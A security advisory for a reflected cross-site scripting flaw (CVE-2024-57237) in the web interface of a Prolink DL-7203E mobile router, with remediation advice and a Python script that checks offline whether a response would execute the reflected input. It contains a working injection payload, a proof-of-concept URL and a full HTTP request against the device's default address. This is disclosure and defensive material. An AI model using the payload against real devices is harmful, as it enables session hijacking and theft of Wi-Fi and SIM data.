4G LTE Mobile Wi-Fi DL7203E Unauthenticated Reflected Cross Site Scripting (CVE-2024-57237)
An unauthenticated reflected XSS (Cross-Site Scripting) vulnerability exists in the /reqproc/proc_get endpoint of the device's web interface. The value of the cmd query parameter is reflected into the response without sanitization or output encoding, and the response is served with a Content-Type of text/html. The browser therefore parses the reflected value as HTML and executes any JavaScript injected through cmd.
Affected Components:
Product Model: 4G LTE Mobile Wi-Fi DL-7203E
Model Number: DL-7203E
Software Version: DL-7203E_V4.0.0B05_240423
Hardware Version: V2.0
Product: https://prolink2u.com/products/dl-7203e-b
Impact
Because the endpoint requires no authentication, an attacker who gets a user on the router's LAN to open a crafted URL can run JavaScript in the origin of the device's web interface. Script running in that origin inherits the victim's session and can issue requests on the victim's behalf, so the usual CSRF protections do not help; for example, it could reboot the device or change the Wi-Fi password.
Sensitive user data exposed by the interface (such as the Wi-Fi password, SIM information and IMEI) could also be read and exfiltrated.
Remediation
Update the API to return a Content-Type of application/json (and send X-Content-Type-Options: nosniff) so that responses are never interpreted as HTML or JavaScript. As defence in depth, the reflected cmd value should also be JSON-encoded or rejected rather than echoed back verbatim.
Payload
<img src=x onerror=alert(document.domain)>
Proof of Concept
Requested against the device's default LAN address (192.168.15.1), the following URL triggers the alert:
http://192.168.15.1/reqproc/proc_get?multi_data=1&isTest=false&sms_received_flag_flag=0&sts_received_flag_flag=0&cmd=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&_=1733067440765
HTTP Request
GET /reqproc/proc_get?multi_data=1&isTest=false&sms_received_flag_flag=0&sts_received_flag_flag=0&cmd=<img%20src=x%20onerror=alert(document.domain)>&_=1733067440765 HTTP/1.1
Host: 192.168.15.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://192.168.15.1/index.html
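The two conditions the advisory describes (the cmd value is reflected verbatim, and the response is rendered as HTML) are what a tester checks before calling a reflection exploitable, and what the remediation must break. The script below is an added example, not code from the advisory or from the vendor: it rebuilds the PoC URL with proper URL encoding, decides from a response's headers and body whether the payload would execute, and contrasts a constructed model of the vulnerable response with a hardened one that applies the remediation above. The function names, the response body layouts and the sample values are assumptions made for illustration; the advisory does not document the real body format.

```python
"""Offline check for the reflection + Content-Type condition behind CVE-2024-57237.

Added example (not the advisory's or vendor's code). The response bodies built
here are constructed models of the behaviour described in the advisory.
"""
import json
from urllib.parse import urlencode

ENDPOINT = "/reqproc/proc_get"
PAYLOAD = "<img src=x onerror=alert(document.domain)>"


def build_poc_url(payload: str = PAYLOAD) -> str:
    """Rebuild the advisory's PoC URL, URL-encoding the payload instead of hand-escaping it."""
    params = {
        "multi_data": "1",
        "isTest": "false",
        "sms_received_flag_flag": "0",
        "sts_received_flag_flag": "0",
        "cmd": payload,
        "_": "1733067440765",  # cache-buster value copied from the advisory's request
    }
    return f"{ENDPOINT}?{urlencode(params)}"


def is_exploitable(headers: dict, body: str, payload: str = PAYLOAD) -> bool:
    """Return True when a browser would execute the reflected payload.

    Both conditions must hold: the payload is echoed back byte-for-byte (not
    HTML-encoded or JSON-escaped) and the body is rendered as HTML. A text/html
    Content-Type does that directly. A missing Content-Type is treated
    conservatively as renderable unless X-Content-Type-Options: nosniff is set,
    since the browser may then sniff the body.
    """
    h = {k.lower(): v for k, v in headers.items()}
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    nosniff = h.get("x-content-type-options", "").strip().lower() == "nosniff"
    renders_as_html = ctype == "text/html" or (ctype == "" and not nosniff)
    reflected_raw = payload in body
    return renders_as_html and reflected_raw


def vulnerable_response(cmd: str) -> tuple[dict, str]:
    """Constructed model of the reported behaviour: cmd echoed raw under text/html."""
    headers = {"Content-Type": "text/html"}
    body = f'{{"{cmd}":""}}'  # assumed shape; the real body format is not documented
    return headers, body


def fixed_response(cmd: str) -> tuple[dict, str]:
    """Hardened model: JSON Content-Type, nosniff, and angle brackets escaped inside the JSON.

    json.dumps alone leaves '<' and '>' untouched, so the raw payload would still
    be present in the body. Escaping them as \\u003c / \\u003e keeps the JSON
    value identical after parsing while removing anything an HTML parser could act on.
    """
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    body = json.dumps({"cmd": cmd, "error": "unknown command"})
    body = body.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")
    return headers, body


def parse_cmd_from_json(body: str) -> str:
    """Decode the hardened body and return the cmd value the client would see."""
    return json.loads(body)["cmd"]


if __name__ == "__main__":
    print("PoC URL:", build_poc_url())
    for label, (h, b) in (("vulnerable", vulnerable_response(PAYLOAD)),
                          ("fixed", fixed_response(PAYLOAD))):
        print(f"{label:10s} exploitable={is_exploitable(h, b)} body={b}")
```

Run it as-is to see the encoded PoC URL and the two verdicts. To test a real device, fetch the PoC URL with an HTTP client that does not follow the Accept header sent by the UI's XHR (a plain browser navigation or curl), then pass the response headers and body to is_exploitable; a fix that only changes the Content-Type flips the verdict, while the extra JSON escaping in fixed_response additionally removes the raw payload from the body.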